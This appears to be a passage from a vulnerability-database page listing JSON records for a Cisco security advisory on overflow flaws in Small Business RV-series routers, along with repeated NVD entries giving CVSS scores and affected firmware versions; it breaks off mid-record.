DATABASE RESOURCES PRICING ABOUT US

{"id": "CISCO-SA-RV-OVERFLOW-WUNUGV4U", "type": "cisco", "bulletinFamily": "software", "title": "Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers Remote Command Execution and Denial of Service Vulnerabilities", "description": "Multiple vulnerabilities in the Universal Plug and Play (UPnP) service and the web-based management interface of Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers could allow a remote attacker to execute arbitrary code or cause an affected device to restart unexpectedly.\n\nFor more information about these vulnerabilities, see the Details [\"#details\"] section of this advisory.\n\nCisco has not released software updates that address these vulnerabilities. There are no workarounds that address these vulnerabilities.\n\nThis advisory is available at the following link:\nhttps://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-rv-overflow-WUnUgv4U [\"https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-rv-overflow-WUnUgv4U\"]", "published": "2021-01-13T16:00:00", "modified": "2021-01-19T16:21:32", "cvss": {"score": 7.2, "vector": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"}, "cvss2": {}, "cvss3": {}, "href": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-rv-overflow-WUnUgv4U", "reporter": "Cisco", "references": ["https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-rv-overflow-WUnUgv4U"], "cvelist": ["CVE-2021-1159", "CVE-2021-1160", "CVE-2021-1161", "CVE-2021-1162", "CVE-2021-1163", "CVE-2021-1164", "CVE-2021-1165", "CVE-2021-1166", "CVE-2021-1167", "CVE-2021-1168", "CVE-2021-1169", "CVE-2021-1170", "CVE-2021-1171", "CVE-2021-1172", "CVE-2021-1173", "CVE-2021-1174", "CVE-2021-1175", "CVE-2021-1176", "CVE-2021-1177", "CVE-2021-1178", "CVE-2021-1179", "CVE-2021-1180", "CVE-2021-1181", "CVE-2021-1182", "CVE-2021-1183", "CVE-2021-1184", "CVE-2021-1185", "CVE-2021-1186", "CVE-2021-1187", "CVE-2021-1188", "CVE-2021-1189", "CVE-2021-1190", "CVE-2021-1191", "CVE-2021-1192", "CVE-2021-1193", "CVE-2021-1194", "CVE-2021-1195", "CVE-2021-1196", "CVE-2021-1197", "CVE-2021-1198", "CVE-2021-1199", "CVE-2021-1200", "CVE-2021-1201", "CVE-2021-1202", "CVE-2021-1203", "CVE-2021-1204", "CVE-2021-1205", "CVE-2021-1206", "CVE-2021-1207", "CVE-2021-1208", "CVE-2021-1209", "CVE-2021-1210", "CVE-2021-1211", "CVE-2021-1212", "CVE-2021-1213", "CVE-2021-1214", "CVE-2021-1215", "CVE-2021-1216", "CVE-2021-1217", "CVE-2021-1307", "CVE-2021-1360"], "immutableFields": [], "lastseen": "2021-09-02T22:30:55", "viewCount": 76, "enchantments": {"dependencies": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2021-0022"]}, {"type": "cve", "idList": ["CVE-2021-1159", "CVE-2021-1160", "CVE-2021-1161", "CVE-2021-1162", "CVE-2021-1163", "CVE-2021-1164", "CVE-2021-1165", "CVE-2021-1166", "CVE-2021-1167", "CVE-2021-1168", "CVE-2021-1169", "CVE-2021-1170", "CVE-2021-1171", "CVE-2021-1172", "CVE-2021-1173", "CVE-2021-1174", "CVE-2021-1175", "CVE-2021-1176", "CVE-2021-1177", "CVE-2021-1178", "CVE-2021-1179", "CVE-2021-1180", "CVE-2021-1181", "CVE-2021-1182", "CVE-2021-1183", "CVE-2021-1184", "CVE-2021-1185", "CVE-2021-1186", "CVE-2021-1187", "CVE-2021-1188", "CVE-2021-1189", "CVE-2021-1190", "CVE-2021-1191", "CVE-2021-1192", "CVE-2021-1193", "CVE-2021-1194", "CVE-2021-1195", "CVE-2021-1196", "CVE-2021-1197", "CVE-2021-1198", "CVE-2021-1199", "CVE-2021-1200", "CVE-2021-1201", "CVE-2021-1202", "CVE-2021-1203", "CVE-2021-1204", "CVE-2021-1205", "CVE-2021-1206", "CVE-2021-1207", "CVE-2021-1208", "CVE-2021-1209", "CVE-2021-1210", "CVE-2021-1211", "CVE-2021-1212", "CVE-2021-1213", "CVE-2021-1214", "CVE-2021-1215", "CVE-2021-1216", "CVE-2021-1217", "CVE-2021-1307", "CVE-2021-1360"]}, {"type": "exploitdb", "idList": ["EDB-ID:49425"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:160953"]}, {"type": "zdt", "idList": ["1337DAY-ID-35676"]}]}, "score": {"value": 3.7, "vector": "NONE"}, "backreferences": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2021-0022"]}, {"type": "cisa", "idList": ["CISA:3FE61675E30B8C4DF8D27791CC9A56ED"]}, {"type": "cve", "idList": ["CVE-2021-1159", "CVE-2021-1160", "CVE-2021-1161", "CVE-2021-1162", "CVE-2021-1163", "CVE-2021-1164", "CVE-2021-1165", "CVE-2021-1166", "CVE-2021-1167", "CVE-2021-1168", "CVE-2021-1169", "CVE-2021-1170", "CVE-2021-1171", "CVE-2021-1172", "CVE-2021-1173", "CVE-2021-1174", "CVE-2021-1175", "CVE-2021-1176", "CVE-2021-1177", "CVE-2021-1178", "CVE-2021-1179", "CVE-2021-1180", "CVE-2021-1181", "CVE-2021-1182", "CVE-2021-1183", "CVE-2021-1184", "CVE-2021-1185", "CVE-2021-1186", "CVE-2021-1187", "CVE-2021-1188", "CVE-2021-1189", "CVE-2021-1190", "CVE-2021-1191", "CVE-2021-1192", "CVE-2021-1193", "CVE-2021-1194", "CVE-2021-1195", "CVE-2021-1196", "CVE-2021-1197", "CVE-2021-1198", "CVE-2021-1199", "CVE-2021-1200", "CVE-2021-1201", "CVE-2021-1202", "CVE-2021-1203", "CVE-2021-1204", "CVE-2021-1205", "CVE-2021-1206", "CVE-2021-1207", "CVE-2021-1208", "CVE-2021-1209", "CVE-2021-1210", "CVE-2021-1211", "CVE-2021-1212", "CVE-2021-1213", "CVE-2021-1214", "CVE-2021-1215", "CVE-2021-1216", "CVE-2021-1217", "CVE-2021-1307", "CVE-2021-1360"]}, {"type": "exploitdb", "idList": ["EDB-ID:49425"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:160953"]}, {"type": "threatpost", "idList": ["THREATPOST:30D70449EF03FFC5099B5B141FA079E2"]}, {"type": "zdt", "idList": ["1337DAY-ID-35676"]}]}, "exploitation": null, "vulnersScore": 3.7}, "affectedSoftware": [{"version": "any", "operator": "eq", "name": "cisco small business rv series router firmware"}, {"version": "any", "operator": "eq", "name": "cisco small business rv series router firmware"}], "vendorCvss": {"score": "7.2", "severity": "high"}, "_state": {"dependencies": 1647589307, "score": 1659749172}}

{"cve": [{"lastseen": "2022-03-23T12:50:20", "description": "Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers could allow an authenticated, remote attacker to execute arbitrary code or cause an affected device to restart unexpectedly. The vulnerabilities are due to improper validation of user-supplied input in the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to an affected device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system or cause the device to reload, resulting in a denial of service (DoS) condition. To exploit these vulnerabilities, an attacker would need to have valid administrator credentials on the affected device. Cisco has not released software updates that address these vulnerabilities.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-13T22:15:00", "type": "cve", "title": "CVE-2021-1360", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1360"], "modified": "2021-01-20T16:08:00", "cpe": ["cpe:/o:cisco:rv130_firmware:1.2.2.8", "cpe:/o:cisco:rv130w_firmware:1.2.2.8", "cpe:/o:cisco:rv215w_firmware:1.2.2.8", "cpe:/o:cisco:rv110w_firmware:1.2.2.8"], "id": "CVE-2021-1360", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-1360", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:cisco:rv215w_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv110w_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130w_firmware:1.2.2.8:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:46:19", "description": "Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers could allow an authenticated, remote attacker to execute arbitrary code or cause an affected device to restart unexpectedly. The vulnerabilities are due to improper validation of user-supplied input in the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to an affected device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system or cause the device to reload, resulting in a denial of service (DoS) condition. To exploit these vulnerabilities, an attacker would need to have valid administrator credentials on the affected device. Cisco has not released software updates that address these vulnerabilities.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-13T22:15:00", "type": "cve", "title": "CVE-2021-1166", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1166"], "modified": "2021-01-19T19:23:00", "cpe": ["cpe:/o:cisco:rv130w_firmware:1.3.1.7", "cpe:/o:cisco:rv215w_wireless-n_vpn_router_firmware:1.3.1.7", "cpe:/o:cisco:rv215w_wireless-n_vpn_router_firmware:1.2.2.8", "cpe:/o:cisco:rv130_vpn_router_firmware:1.3.1.7", "cpe:/o:cisco:rv130_vpn_router_firmware:1.2.2.8", "cpe:/o:cisco:rv110w_firmware:1.3.1.7", "cpe:/o:cisco:rv130w_firmware:1.2.2.8", "cpe:/o:cisco:rv110w_firmware:1.2.2.8", "cpe:/a:cisco:application_extension_platform:1.0.3.55"], "id": "CVE-2021-1166", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-1166", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:cisco:rv130w_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv215w_wireless-n_vpn_router_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130_vpn_router_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130w_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:application_extension_platform:1.0.3.55:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv215w_wireless-n_vpn_router_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv110w_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130_vpn_router_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv110w_firmware:1.2.2.8:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:46:55", "description": "Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers could allow an authenticated, remote attacker to execute arbitrary code or cause an affected device to restart unexpectedly. The vulnerabilities are due to improper validation of user-supplied input in the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to an affected device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system or cause the device to reload, resulting in a denial of service (DoS) condition. To exploit these vulnerabilities, an attacker would need to have valid administrator credentials on the affected device. Cisco has not released software updates that address these vulnerabilities.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-13T22:15:00", "type": "cve", "title": "CVE-2021-1193", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1193"], "modified": "2021-01-15T19:50:00", "cpe": ["cpe:/o:cisco:rv130w_firmware:1.3.1.7", "cpe:/o:cisco:rv215w_wireless-n_vpn_router_firmware:1.3.1.7", "cpe:/o:cisco:rv215w_wireless-n_vpn_router_firmware:1.2.2.8", "cpe:/o:cisco:rv130_vpn_router_firmware:1.3.1.7", "cpe:/o:cisco:rv130_vpn_router_firmware:1.2.2.8", "cpe:/o:cisco:rv110w_firmware:1.3.1.7", "cpe:/o:cisco:rv130w_firmware:1.2.2.8", "cpe:/o:cisco:rv110w_firmware:1.2.2.8", "cpe:/a:cisco:application_extension_platform:1.0.3.55"], "id": "CVE-2021-1193", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-1193", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:cisco:rv130w_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv215w_wireless-n_vpn_router_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130_vpn_router_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130w_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:application_extension_platform:1.0.3.55:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv215w_wireless-n_vpn_router_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv110w_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130_vpn_router_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv110w_firmware:1.2.2.8:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:46:35", "description": "Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers could allow an authenticated, remote attacker to execute arbitrary code or cause an affected device to restart unexpectedly. The vulnerabilities are due to improper validation of user-supplied input in the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to an affected device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system or cause the device to reload, resulting in a denial of service (DoS) condition. To exploit these vulnerabilities, an attacker would need to have valid administrator credentials on the affected device. Cisco has not released software updates that address these vulnerabilities.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-13T22:15:00", "type": "cve", "title": "CVE-2021-1178", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1178"], "modified": "2021-01-19T19:16:00", "cpe": ["cpe:/o:cisco:rv130w_firmware:1.3.1.7", "cpe:/o:cisco:rv215w_wireless-n_vpn_router_firmware:1.3.1.7", "cpe:/o:cisco:rv215w_wireless-n_vpn_router_firmware:1.2.2.8", "cpe:/o:cisco:rv130_vpn_router_firmware:1.3.1.7", "cpe:/o:cisco:rv130_vpn_router_firmware:1.2.2.8", "cpe:/o:cisco:rv110w_firmware:1.3.1.7", "cpe:/o:cisco:rv130w_firmware:1.2.2.8", "cpe:/o:cisco:rv110w_firmware:1.2.2.8", "cpe:/a:cisco:application_extension_platform:1.0.3.55"], "id": "CVE-2021-1178", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-1178", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:cisco:rv130w_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv215w_wireless-n_vpn_router_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130_vpn_router_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130w_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:application_extension_platform:1.0.3.55:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv215w_wireless-n_vpn_router_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv110w_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130_vpn_router_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv110w_firmware:1.2.2.8:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:46:17", "description": "Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers could allow an authenticated, remote attacker to execute arbitrary code or cause an affected device to restart unexpectedly. The vulnerabilities are due to improper validation of user-supplied input in the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to an affected device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system or cause the device to reload, resulting in a denial of service (DoS) condition. To exploit these vulnerabilities, an attacker would need to have valid administrator credentials on the affected device. Cisco has not released software updates that address these vulnerabilities.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-13T22:15:00", "type": "cve", "title": "CVE-2021-1164", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1164"], "modified": "2021-01-19T19:30:00", "cpe": ["cpe:/o:cisco:rv130w_firmware:1.3.1.7", "cpe:/o:cisco:rv215w_wireless-n_vpn_router_firmware:1.3.1.7", "cpe:/o:cisco:rv215w_wireless-n_vpn_router_firmware:1.2.2.8", "cpe:/o:cisco:rv130_vpn_router_firmware:1.3.1.7", "cpe:/o:cisco:rv130_vpn_router_firmware:1.2.2.8", "cpe:/o:cisco:rv110w_firmware:1.3.1.7", "cpe:/o:cisco:rv130w_firmware:1.2.2.8", "cpe:/o:cisco:rv110w_firmware:1.2.2.8", "cpe:/a:cisco:application_extension_platform:1.0.3.55"], "id": "CVE-2021-1164", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-1164", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:cisco:rv130w_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv215w_wireless-n_vpn_router_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130_vpn_router_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130w_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:application_extension_platform:1.0.3.55:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv215w_wireless-n_vpn_router_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv110w_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130_vpn_router_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv110w_firmware:1.2.2.8:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:46:32", "description": "Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers could allow an authenticated, remote attacker to execute arbitrary code or cause an affected device to restart unexpectedly. The vulnerabilities are due to improper validation of user-supplied input in the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to an affected device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system or cause the device to reload, resulting in a denial of service (DoS) condition. To exploit these vulnerabilities, an attacker would need to have valid administrator credentials on the affected device. Cisco has not released software updates that address these vulnerabilities.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-13T22:15:00", "type": "cve", "title": "CVE-2021-1177", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1177"], "modified": "2021-01-19T19:16:00", "cpe": ["cpe:/o:cisco:rv130w_firmware:1.3.1.7", "cpe:/o:cisco:rv215w_wireless-n_vpn_router_firmware:1.3.1.7", "cpe:/o:cisco:rv215w_wireless-n_vpn_router_firmware:1.2.2.8", "cpe:/o:cisco:rv130_vpn_router_firmware:1.3.1.7", "cpe:/o:cisco:rv130_vpn_router_firmware:1.2.2.8", "cpe:/o:cisco:rv110w_firmware:1.3.1.7", "cpe:/o:cisco:rv130w_firmware:1.2.2.8", "cpe:/o:cisco:rv110w_firmware:1.2.2.8", "cpe:/a:cisco:application_extension_platform:1.0.3.55"], "id": "CVE-2021-1177", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-1177", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:cisco:rv130w_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv215w_wireless-n_vpn_router_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130_vpn_router_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130w_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:application_extension_platform:1.0.3.55:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv215w_wireless-n_vpn_router_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv110w_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130_vpn_router_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv110w_firmware:1.2.2.8:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:46:32", "description": "Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers could allow an authenticated, remote attacker to execute arbitrary code or cause an affected device to restart unexpectedly. The vulnerabilities are due to improper validation of user-supplied input in the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to an affected device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system or cause the device to reload, resulting in a denial of service (DoS) condition. To exploit these vulnerabilities, an attacker would need to have valid administrator credentials on the affected device. Cisco has not released software updates that address these vulnerabilities.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-13T22:15:00", "type": "cve", "title": "CVE-2021-1176", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1176"], "modified": "2021-01-19T19:17:00", "cpe": ["cpe:/o:cisco:rv130w_firmware:1.3.1.7", "cpe:/o:cisco:rv215w_wireless-n_vpn_router_firmware:1.3.1.7", "cpe:/o:cisco:rv215w_wireless-n_vpn_router_firmware:1.2.2.8", "cpe:/o:cisco:rv130_vpn_router_firmware:1.3.1.7", "cpe:/o:cisco:rv130_vpn_router_firmware:1.2.2.8", "cpe:/o:cisco:rv110w_firmware:1.3.1.7", "cpe:/o:cisco:rv130w_firmware:1.2.2.8", "cpe:/o:cisco:rv110w_firmware:1.2.2.8", "cpe:/a:cisco:application_extension_platform:1.0.3.55"], "id": "CVE-2021-1176", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-1176", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:cisco:rv130w_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv215w_wireless-n_vpn_router_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130_vpn_router_firmware:1.3.1.7:*:*:*:*:*:*:*", 